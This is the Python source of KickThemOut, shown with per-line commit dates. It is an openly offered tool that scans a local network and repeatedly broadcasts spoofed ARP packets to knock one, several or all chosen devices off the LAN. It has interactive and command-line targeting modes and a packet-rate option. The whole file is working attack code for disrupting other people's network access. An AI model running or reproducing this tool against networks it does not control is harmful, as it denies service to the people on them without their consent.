kickthemout/kickthemout.py

805 lines
29 KiB
Python
Raw Normal View History

2018-02-05 20:39:08 +01:00
#!/usr/bin/env python3
2016-12-07 16:05:14 +01:00
# -.- coding: utf-8 -.-
# kickthemout.py
"""
2018-02-05 20:39:08 +01:00
Copyright (C) 2017-18 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com)
2016-12-07 17:25:17 +01:00
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
2016-12-07 16:05:14 +01:00
"""
2018-02-05 20:39:08 +01:00
import os, sys, logging, math, traceback, optparse, threading
2016-12-07 16:05:14 +01:00
from time import sleep
2017-01-20 14:58:05 +01:00
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
2017-01-01 15:25:46 +01:00
2017-01-20 14:50:20 +01:00
try:
2017-04-05 18:14:22 +02:00
# check whether user is root
2017-01-20 14:50:20 +01:00
if os.geteuid() != 0:
2018-02-05 20:39:08 +01:00
print("\n{}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{}$ sudo python3 kickthemout.py{}\n".format(RED, GREEN, END))
os._exit(1)
2017-01-20 14:50:20 +01:00
except:
2017-04-05 18:14:22 +02:00
# then user is probably on windows
2017-01-20 14:50:20 +01:00
pass
2018-02-05 20:39:08 +01:00
def shutdown():
print('\n\n{}Thanks for dropping by.'
'\nCatch ya later!{}'.format(GREEN, END))
2019-02-17 01:41:10 +01:00
os._exit(0)
2017-01-20 14:50:20 +01:00
2018-11-07 07:49:57 +01:00
logging.getLogger("kamene.runtime").setLevel(logging.ERROR) # Shut up kamene!
2017-01-13 12:53:35 +01:00
try:
2018-11-07 07:49:57 +01:00
from kamene.config import conf
2018-04-25 16:17:14 +02:00
conf.ipv6_enabled = False
2018-11-07 07:49:57 +01:00
from kamene.all import *
2018-02-05 20:39:08 +01:00
import scan, spoof, nmap
from urllib.request import urlopen, Request
2018-04-25 16:15:59 +02:00
from urllib.error import URLError
2018-02-05 20:39:08 +01:00
except KeyboardInterrupt:
shutdown()
2017-01-13 12:53:35 +01:00
except:
2018-02-05 20:39:08 +01:00
print("\n{}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.".format(RED))
print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
os._exit(1)
2016-12-07 16:05:14 +01:00
2017-04-05 18:14:22 +02:00
# display heading
2016-12-07 16:05:14 +01:00
def heading():
2017-04-01 16:24:17 +02:00
spaces = " " * 76
sys.stdout.write(GREEN + spaces + """
2016-12-07 16:05:14 +01:00
2017-01-01 15:25:46 +01:00
""" + END + BLUE +
2018-02-05 20:39:08 +01:00
'\n' + '{}Kick Devices Off Your LAN ({}KickThemOut{}){}'.format(YELLOW, RED, YELLOW, BLUE).center(98) +
'\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(111) +
'\n' + 'Version: {}2.0{} \n'.format(YELLOW, END).center(86))
# loading animation during network scan
def scanningAnimation(text):
try:
global stopAnimation
i = 0
while stopAnimation is not True:
tempText = list(text)
if i >= len(tempText):
i = 0
tempText[i] = tempText[i].upper()
tempText = ''.join(tempText)
sys.stdout.write(GREEN + tempText + '\r' + END)
sys.stdout.flush()
i += 1
time.sleep(0.1)
except:
os._exit(1)
2017-01-01 15:25:46 +01:00
2017-04-05 18:14:22 +02:00
# display options
2016-12-07 16:05:14 +01:00
def optionBanner():
2018-02-05 20:39:08 +01:00
print('\nChoose an option from the menu:\n')
2017-01-01 17:06:15 +01:00
sleep(0.2)
2018-02-05 20:39:08 +01:00
print('\t{}[{}1{}]{} Kick ONE Off'.format(YELLOW, RED, YELLOW, WHITE))
2016-12-07 16:05:14 +01:00
sleep(0.2)
2018-02-05 20:39:08 +01:00
print('\t{}[{}2{}]{} Kick SOME Off'.format(YELLOW, RED, YELLOW, WHITE))
2016-12-07 16:05:14 +01:00
sleep(0.2)
2018-02-05 20:39:08 +01:00
print('\t{}[{}3{}]{} Kick ALL Off'.format(YELLOW, RED, YELLOW, WHITE))
2016-12-07 16:05:14 +01:00
sleep(0.2)
2018-02-05 20:39:08 +01:00
print('\n\t{}[{}E{}]{} Exit KickThemOut\n'.format(YELLOW, RED, YELLOW, WHITE))
2016-12-07 16:05:14 +01:00
2017-04-05 18:14:22 +02:00
# initiate debugging process
2017-02-13 22:17:15 +01:00
def runDebug():
2018-02-05 20:39:08 +01:00
print("\n\n{}WARNING! An unknown error has occurred, starting debug...{}".format(RED, END))
2017-02-13 22:17:15 +01:00
print(
2018-02-05 20:39:08 +01:00
"{}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){}".format(
RED, END))
2017-02-13 22:17:15 +01:00
try:
print("Current defaultGatewayMac: " + defaultGatewayMac)
except:
2018-02-03 13:30:24 +01:00
print("Failed to print defaultGatewayMac...")
2017-02-13 22:17:15 +01:00
try:
2018-02-05 20:39:08 +01:00
print("Reloading MAC retriever function...")
2017-02-13 22:17:15 +01:00
regenOnlineIPs()
print("Reloaded defaultGatewayMac: " + defaultGatewayMac)
except:
2018-02-05 20:39:08 +01:00
print("Failed to reload MAC retriever function / to print defaultGatewayMac...")
2017-02-13 22:17:15 +01:00
try:
2018-02-03 13:30:24 +01:00
print("Known gateway IP: " + defaultGatewayIP)
2017-02-13 22:17:15 +01:00
except:
2018-02-03 13:30:24 +01:00
print("Failed to print defaultGatewayIP...")
2017-04-03 23:22:42 +02:00
try:
2018-02-03 13:30:24 +01:00
print("Crash trace: ")
2017-04-03 23:22:42 +02:00
print(traceback.format_exc())
except:
2018-02-03 13:30:24 +01:00
print("Failed to print crash trace...")
print("DEBUG FINISHED.\nShutting down...")
2018-02-05 20:39:08 +01:00
print("{}".format(END))
os._exit(1)
# make sure there is an internet connection
def checkInternetConnection():
try:
urlopen('https://github.com', timeout=3)
2018-02-05 20:39:08 +01:00
return True
2018-04-25 16:15:59 +02:00
except URLError as err:
2018-02-05 20:39:08 +01:00
return False
except KeyboardInterrupt:
shutdown()
# retrieve network interface
def getDefaultInterface(returnNet=False):
def long2net(arg):
if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg))
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
def to_CIDR_notation(bytes_network, bytes_netmask):
2018-11-07 07:49:57 +01:00
network = kamene.utils.ltoa(bytes_network)
2018-02-05 20:39:08 +01:00
netmask = long2net(bytes_netmask)
net = "%s/%s" % (network, netmask)
if netmask < 16:
return None
return net
2018-11-07 07:49:57 +01:00
iface_routes = [route for route in kamene.config.conf.route.routes if route[3] == kamene.config.conf.iface and route[1] != 0xFFFFFFFF]
2018-02-05 20:39:08 +01:00
network, netmask, _, interface, address = max(iface_routes, key=lambda item:item[1])
net = to_CIDR_notation(network, netmask)
if net:
if returnNet:
return net
else:
return interface
# retrieve default interface MAC address
def getDefaultInterfaceMAC():
try:
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
if defaultInterfaceMac == "" or not defaultInterfaceMac:
print(
"\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(
RED, END))
header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
return (input(header))
else:
return defaultInterfaceMac
except:
2018-11-07 07:49:57 +01:00
# request interface MAC address (after failed detection by kamene)
2018-02-05 20:39:08 +01:00
print("\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
return (input(header))
# retrieve gateway IP
def getGatewayIP():
global stopAnimation
try:
2018-09-23 08:09:15 +02:00
getGateway = sr1(IP(dst="github.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
2018-02-05 20:39:08 +01:00
return getGateway.src
except:
2018-11-07 07:49:57 +01:00
# request gateway IP address (after failed detection by kamene)
2018-02-05 20:39:08 +01:00
stopAnimation = True
print("\n{}ERROR: Gateway IP could not be obtained. Please enter IP manually.{}\n".format(RED, END))
header = ('{}kickthemout{}> {}Enter Gateway IP {}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
return (input(header))
# retrieve host MAC address
def retrieveMACAddress(host):
try:
query = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=host)
ans, _ = srp(query, timeout=2, verbose=0)
for _, rcv in ans:
return rcv[Ether].src
break
except:
return False
# resolve mac address of each vendor
def resolveMac(mac):
try:
# send request to macvendors.co
url = "http://macvendors.co/api/vendorname/"
request = Request(url + mac, headers={'User-Agent': "API Browser"})
response = urlopen(request)
vendor = response.read()
vendor = vendor.decode("utf-8")
vendor = vendor[:25]
return vendor
except KeyboardInterrupt:
shutdown()
except:
return "N/A"
2017-02-13 22:17:15 +01:00
2017-04-05 18:14:22 +02:00
# regenerate online IPs array & configure gateway
2017-01-01 15:25:46 +01:00
def regenOnlineIPs():
2018-02-05 20:39:08 +01:00
global onlineIPs, defaultGatewayMac, defaultGatewayMacSet
2017-02-13 22:17:15 +01:00
if not defaultGatewayMacSet:
defaultGatewayMac = ""
2017-01-01 15:25:46 +01:00
onlineIPs = []
for host in hostsList:
onlineIPs.append(host[0])
2017-02-13 22:17:15 +01:00
if not defaultGatewayMacSet:
if host[0] == defaultGatewayIP:
defaultGatewayMac = host[1]
if not defaultGatewayMacSet and defaultGatewayMac == "":
2018-11-07 07:49:57 +01:00
# request gateway MAC address (after failed detection by kamene)
2018-02-05 20:39:08 +01:00
print("\n{}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
header = ("{}kickthemout{}> {}Enter your gateway's MAC Address {}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END))
defaultGatewayMac = input(header)
2017-02-13 22:17:15 +01:00
defaultGatewayMacSet = True
2017-01-01 15:25:46 +01:00
2017-04-05 18:14:22 +02:00
# scan network
2017-01-02 10:47:49 +01:00
def scanNetwork():
global hostsList
try:
2017-04-05 18:14:22 +02:00
# call scanning function from scan.py
2017-03-11 10:53:38 +01:00
hostsList = scan.scanNetwork(getDefaultInterface(True))
2017-02-13 22:17:15 +01:00
except KeyboardInterrupt:
shutdown()
except:
2018-02-05 20:39:08 +01:00
print("\n\n{}ERROR: Network scanning failed. Please check your requirements configuration.{}".format(RED, END))
print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
2018-02-05 20:39:08 +01:00
os._exit(1)
try:
regenOnlineIPs()
except KeyboardInterrupt:
shutdown()
2017-01-02 10:47:49 +01:00
2018-02-05 20:39:08 +01:00
# non-interactive attack
def nonInteractiveAttack():
print("\n{}nonInteractiveAttack{} activated...{}\n".format(RED, GREEN, END))
target = options.targets
print("\n{}Target(s): {}{}".format(GREEN, END, ", ".join(target)))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Checking target status...',))
t.daemon = True
t.start()
2018-02-03 13:30:24 +01:00
try:
2018-02-05 20:39:08 +01:00
nm = nmap.PortScanner()
counter = 0
for host in target:
a = nm.scan(hosts=host, arguments='-sn')
if a['scan'] != {}:
for k, v in a['scan'].items():
if str(v['status']['state']) == 'up':
pass
else:
if len(target) == 1 or counter == len(target)-1:
stopAnimation = True
sys.stdout.write("\033[K")
print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
os._exit(1)
else:
sys.stdout.write("\033[K")
print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
target.remove(host)
counter += 1
pass
else:
if len(target) == 1 or counter == len(target)-1:
stopAnimation = True
sys.stdout.write("\033[K")
print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
os._exit(1)
else:
sys.stdout.write("\033[K")
print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
target.remove(host)
counter += 1
pass
stopAnimation = True
sys.stdout.write("\033[K")
defaultGatewayIP = getGatewayIP()
defaultGatewayMac = retrieveMACAddress(defaultGatewayIP)
except KeyboardInterrupt:
shutdown()
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
try:
while True:
# broadcast malicious ARP packets
for i in target:
ipAddress = i
macAddress = retrieveMACAddress(ipAddress)
if macAddress == False:
print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
os._exit(1)
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, ipAddress, macAddress)
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
except KeyboardInterrupt:
# re-arp targets on KeyboardInterrupt exception
print("\n{}Re-arping{} target(s)...{}".format(RED, GREEN, END))
reArp = 1
while reArp != 10:
# broadcast ARP packets with legitimate info to restore connection
for i in target:
ipAddress = i
try:
macAddress = retrieveMACAddress(ipAddress)
except:
print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
os._exit(1)
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, ipAddress, macAddress)
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.2)
print("{}Re-arped{} target(s) successfully.{}".format(RED, GREEN, END))
2018-02-03 13:30:24 +01:00
2017-04-05 18:14:22 +02:00
# kick one device
def kickoneoff():
2016-12-31 01:41:34 +01:00
os.system("clear||cls")
2017-01-01 15:25:46 +01:00
2018-02-05 20:39:08 +01:00
print("\n{}kickONEOff{} selected...{}\n".format(RED, GREEN, END))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
2017-01-01 15:25:46 +01:00
print("Online IPs: ")
2016-12-31 01:41:34 +01:00
for i in range(len(onlineIPs)):
2017-01-01 15:25:46 +01:00
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
2018-02-05 20:39:08 +01:00
try:
hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
except:
hostname = "N/A"
2017-01-01 15:25:46 +01:00
vendor = resolveMac(mac)
2018-02-05 20:39:08 +01:00
print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
2017-01-01 15:25:46 +01:00
canBreak = False
while not canBreak:
try:
2018-02-05 20:39:08 +01:00
choice = int(input("\nChoose a target: "))
oneTargetIP = onlineIPs[choice]
2017-01-01 15:25:46 +01:00
canBreak = True
except KeyboardInterrupt:
2018-02-05 20:39:08 +01:00
shutdown()
2017-01-01 15:25:46 +01:00
except:
2018-02-05 20:39:08 +01:00
print("\n{}ERROR: Please enter a number from the list!{}".format(RED, END))
2016-12-31 01:41:34 +01:00
2017-04-05 18:14:22 +02:00
# locate MAC of specified device
2018-02-05 20:39:08 +01:00
oneTargetMAC = ""
2016-12-31 01:41:34 +01:00
for host in hostsList:
2018-02-05 20:39:08 +01:00
if host[0] == oneTargetIP:
oneTargetMAC = host[1]
if oneTargetMAC == "":
2016-12-31 01:41:34 +01:00
print("\nIP address is not up. Please try again.")
2017-01-02 10:47:49 +01:00
return
2016-12-31 01:41:34 +01:00
2018-02-05 20:39:08 +01:00
print("\n{}Target: {}{}".format(GREEN, END, oneTargetIP))
2017-01-02 10:47:49 +01:00
2018-02-05 20:39:08 +01:00
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
2016-12-31 01:41:34 +01:00
try:
while True:
2018-02-05 20:39:08 +01:00
# broadcast malicious ARP packets
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, oneTargetIP, oneTargetMAC)
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
2016-12-31 01:41:34 +01:00
except KeyboardInterrupt:
2017-04-05 18:14:22 +02:00
# re-arp target on KeyboardInterrupt exception
2018-02-05 20:39:08 +01:00
print("\n{}Re-arping{} target...{}".format(RED, GREEN, END))
2017-01-02 10:47:49 +01:00
reArp = 1
while reArp != 10:
2017-02-13 22:17:15 +01:00
try:
2017-04-05 18:14:22 +02:00
# broadcast ARP packets with legitimate info to restore connection
2017-02-13 22:17:15 +01:00
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
2017-01-02 10:47:49 +01:00
reArp += 1
2018-02-05 20:39:08 +01:00
time.sleep(0.2)
print("{}Re-arped{} target successfully.{}".format(RED, GREEN, END))
2016-12-07 16:05:14 +01:00
2017-01-01 15:25:46 +01:00
2017-04-05 18:14:22 +02:00
# kick multiple devices
2016-12-07 16:05:14 +01:00
def kicksomeoff():
2017-01-01 17:06:15 +01:00
os.system("clear||cls")
2018-02-05 20:39:08 +01:00
print("\n{}kickSOMEOff{} selected...{}\n".format(RED, GREEN, END))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
2017-01-01 17:06:15 +01:00
print("Online IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
2018-02-05 20:39:08 +01:00
try:
hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
except:
hostname = "N/A"
2017-01-01 17:06:15 +01:00
vendor = resolveMac(mac)
2018-02-05 20:39:08 +01:00
print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
2017-01-01 17:06:15 +01:00
canBreak = False
while not canBreak:
try:
2018-02-05 20:39:08 +01:00
choice = input("\nChoose devices to target (comma-separated): ")
2017-01-02 22:38:51 +01:00
if ',' in choice:
2018-02-05 20:39:08 +01:00
someTargets = choice.split(",")
2017-01-02 22:38:51 +01:00
canBreak = True
else:
2018-02-05 20:39:08 +01:00
print("\n{}ERROR: Please select more than 1 devices from the list.{}\n".format(RED, END))
2017-01-01 17:06:15 +01:00
except KeyboardInterrupt:
2018-02-05 20:39:08 +01:00
shutdown()
2017-01-01 17:06:15 +01:00
2018-02-05 20:39:08 +01:00
someIPList = ""
for i in someTargets:
2017-01-01 17:06:15 +01:00
try:
2018-02-05 20:39:08 +01:00
someIPList += onlineIPs[int(i)] + ", "
2017-01-01 17:06:15 +01:00
except KeyboardInterrupt:
2018-02-05 20:39:08 +01:00
shutdown()
2017-01-01 17:06:15 +01:00
except:
2018-02-05 20:39:08 +01:00
print("\n{}ERROR: '{}{}{}' is not in the list.{}\n".format(RED, GREEN, i, RED, END))
2017-01-01 17:06:15 +01:00
return
2018-02-05 20:39:08 +01:00
someIPList = someIPList[:-2] + END
2017-01-01 17:06:15 +01:00
2018-02-05 20:39:08 +01:00
print("\n{}Targets: {}{}".format(GREEN, END, someIPList))
2017-01-01 17:06:15 +01:00
2018-02-05 20:39:08 +01:00
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
2017-01-01 17:06:15 +01:00
try:
while True:
2018-02-05 20:39:08 +01:00
# broadcast malicious ARP packets
for i in someTargets:
2017-01-01 17:06:15 +01:00
ip = onlineIPs[int(i)]
for host in hostsList:
if host[0] == ip:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
2018-02-05 20:39:08 +01:00
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
2017-01-01 17:06:15 +01:00
except KeyboardInterrupt:
2017-04-05 18:14:22 +02:00
# re-arp targets on KeyboardInterrupt exception
2018-02-05 20:39:08 +01:00
print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END))
2017-01-02 10:47:49 +01:00
reArp = 1
while reArp != 10:
2017-04-05 18:14:22 +02:00
# broadcast ARP packets with legitimate info to restore connection
2018-02-05 20:39:08 +01:00
for i in someTargets:
2017-01-01 17:06:15 +01:00
ip = onlineIPs[int(i)]
for host in hostsList:
if host[0] == ip:
2017-02-13 22:17:15 +01:00
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
2017-01-02 10:47:49 +01:00
reArp += 1
2018-02-05 20:39:08 +01:00
time.sleep(0.2)
print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END))
2017-01-01 15:25:46 +01:00
2017-04-05 18:14:22 +02:00
# kick all devices
2016-12-07 16:05:14 +01:00
def kickalloff():
2017-01-01 15:25:46 +01:00
os.system("clear||cls")
2018-02-05 20:39:08 +01:00
print("\n{}kickALLOff{} selected...{}\n".format(RED, GREEN, END))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
print("Target(s): ")
2017-01-01 15:25:46 +01:00
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
2018-02-05 20:39:08 +01:00
try:
hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
except:
hostname = "N/A"
2017-01-01 15:25:46 +01:00
vendor = resolveMac(mac)
2018-02-05 20:39:08 +01:00
print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
2017-01-01 15:25:46 +01:00
try:
2018-02-05 20:39:08 +01:00
# broadcast malicious ARP packets
2017-01-01 15:25:46 +01:00
reScan = 0
while True:
for host in hostsList:
if host[0] != defaultGatewayIP:
2017-04-05 18:14:22 +02:00
# dodge gateway (avoid crashing network itself)
2017-01-01 15:25:46 +01:00
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
2017-01-02 10:47:49 +01:00
reScan += 1
2017-01-01 15:25:46 +01:00
if reScan == 4:
reScan = 0
scanNetwork()
2018-02-05 20:39:08 +01:00
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
2017-01-01 15:25:46 +01:00
except KeyboardInterrupt:
2018-02-05 20:39:08 +01:00
print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END))
2017-01-02 10:47:49 +01:00
reArp = 1
while reArp != 10:
2017-04-05 18:14:22 +02:00
# broadcast ARP packets with legitimate info to restore connection
2017-01-01 15:25:46 +01:00
for host in hostsList:
if host[0] != defaultGatewayIP:
2017-02-13 22:17:15 +01:00
try:
2017-04-05 18:14:22 +02:00
# dodge gateway
2017-02-13 22:17:15 +01:00
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
2017-01-02 10:47:49 +01:00
reArp += 1
2018-02-05 20:39:08 +01:00
time.sleep(0.2)
print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END))
2017-01-01 15:25:46 +01:00
2017-04-05 18:14:22 +02:00
2018-02-05 20:39:08 +01:00
# script's main function
def main():
2017-04-26 19:52:54 +02:00
2018-02-05 20:39:08 +01:00
# display heading
heading()
2016-12-31 01:41:34 +01:00
2018-02-05 20:39:08 +01:00
if interactive:
print("\n{}Using interface '{}{}{}' with MAC address '{}{}{}'.\nGateway IP: '{}{}{}' --> {}{}{} hosts are up.{}".format(
GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, str(len(hostsList)), GREEN, END))
# display warning in case of no active hosts
if len(hostsList) == 0 or len(hostsList) == 1:
if len(hostsList) == 1:
if hostsList[0][0] == defaultGatewayIP:
print("\n{}{}WARNING: There are {}0 hosts up{} on you network except your gateway.\n\tYou can't kick anyone off {}:/{}\n".format(
GREEN, RED, GREEN, RED, GREEN, END))
os._exit(1)
else:
print(
"\n{}{}WARNING: There are {}0 hosts{} up on you network.\n\tIt looks like something went wrong {}:/{}".format(
GREEN, RED, GREEN, RED, GREEN, END))
print(
"\n{}If you are experiencing this error multiple times, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n{}".format(
RED, BLUE, END))
os._exit(1)
2017-04-05 18:14:22 +02:00
2018-02-05 20:39:08 +01:00
else:
print("\n{}Using interface '{}{}{}' with MAC address '{}{}{}'.\nGateway IP: '{}{}{}' --> Target(s): '{}{}{}'.{}".format(
GREEN, RED, defaultInterface, GREEN, RED, defaultInterfaceMac, GREEN, RED, defaultGatewayIP, GREEN, RED, ", ".join(options.targets), GREEN, END))
2016-12-07 16:05:14 +01:00
2018-02-05 20:39:08 +01:00
if options.targets is None and options.scan is False:
try:
2017-04-05 18:14:22 +02:00
2018-02-05 20:39:08 +01:00
while True:
optionBanner()
2017-04-05 18:14:22 +02:00
2018-02-05 20:39:08 +01:00
header = ('{}kickthemout{}> {}'.format(BLUE, WHITE, END))
choice = input(header)
2017-04-05 18:14:22 +02:00
2018-02-05 20:39:08 +01:00
if choice.upper() == 'E' or choice.upper() == 'EXIT':
shutdown()
2016-12-07 16:05:14 +01:00
2018-02-05 20:39:08 +01:00
elif choice == '1':
kickoneoff()
2017-04-05 18:14:22 +02:00
2018-02-05 20:39:08 +01:00
elif choice == '2':
kicksomeoff()
2017-04-05 18:14:22 +02:00
2018-02-05 20:39:08 +01:00
elif choice == '3':
kickalloff()
2017-01-21 16:33:46 +01:00
2018-02-05 20:39:08 +01:00
elif choice.upper() == 'CLEAR':
os.system("clear||cls")
else:
print("\n{}ERROR: Please select a valid option.{}\n".format(RED, END))
2016-12-07 16:05:14 +01:00
2018-02-05 20:39:08 +01:00
except KeyboardInterrupt:
shutdown()
elif options.scan is not False:
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Scanning your network, hang on...',))
t.daemon = True
t.start()
# commence scanning process
try:
scanNetwork()
except KeyboardInterrupt:
shutdown()
stopAnimation = True
print("\nOnline IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
try:
hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0]
except:
hostname = "N/A"
vendor = resolveMac(mac)
print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END))
2017-01-15 19:04:03 +01:00
2018-02-05 20:39:08 +01:00
else:
nonInteractiveAttack()
2016-12-07 16:05:14 +01:00
2017-01-21 16:31:25 +01:00
if __name__ == '__main__':
2018-02-05 20:39:08 +01:00
# implement option parser
optparse.OptionParser.format_epilog = lambda self, formatter: self.epilog
version = '2.0'
examples = ('\nExamples:\n'+
' sudo python3 kickthemout.py --target 192.168.1.10 \n'+
' sudo python3 kickthemout.py -t 192.168.1.5,192.168.1.10 -p 30\n'+
' sudo python3 kickthemout.py -s\n'+
' sudo python3 kickthemout.py (interactive mode)\n')
parser = optparse.OptionParser(epilog=examples,
usage='sudo python3 %prog [options]',
prog='kickthemout.py', version=('KickThemOut ' + version))
parser.add_option('-p', '--packets', action='store',
dest='packets', help='number of packets broadcasted per minute (default: 6)')
parser.add_option('-s', '--scan', action='store_true', default=False,
dest='scan', help='perform a quick network scan and exit')
parser.add_option('-a', '--kick-all', action='store_true', default=False,
dest='kick_all', help='perform attack on all online devices')
2018-02-05 20:39:08 +01:00
def targetList(option, opt, value, parser):
setattr(parser.values, option.dest, value.split(','))
parser.add_option('-t', '--target', action='callback',
callback=targetList, type='string',
dest='targets', help='specify target IP address(es) and perform attack')
def target_files(option, opt, value, parser):
with open(value) as file:
addr_list = file.readlines()
setattr(parser.values, option.dest, addr_list)
parser.add_option('-f', '--file', action='callback',
callback=target_files, type='string',metavar='FILE',
2019-05-16 21:15:02 +02:00
dest='targets', help='read target IP address(es), one per line, from given file and perform attack')
2018-02-05 20:39:08 +01:00
(options, argv) = parser.parse_args()
try:
if checkInternetConnection():
pass
else:
print("\n{}ERROR: It seems that you are offline. Please check your internet connection.{}\n".format(RED, END))
os._exit(1)
except KeyboardInterrupt:
shutdown()
2017-01-21 16:33:46 +01:00
2017-04-05 18:14:22 +02:00
# configure appropriate network info
2018-02-05 20:39:08 +01:00
try:
defaultInterface = getDefaultInterface()
defaultGatewayIP = getGatewayIP()
defaultInterfaceMac = getDefaultInterfaceMAC()
global defaultGatewayMacSet
defaultGatewayMacSet = False
except KeyboardInterrupt:
shutdown()
2017-04-05 18:14:22 +02:00
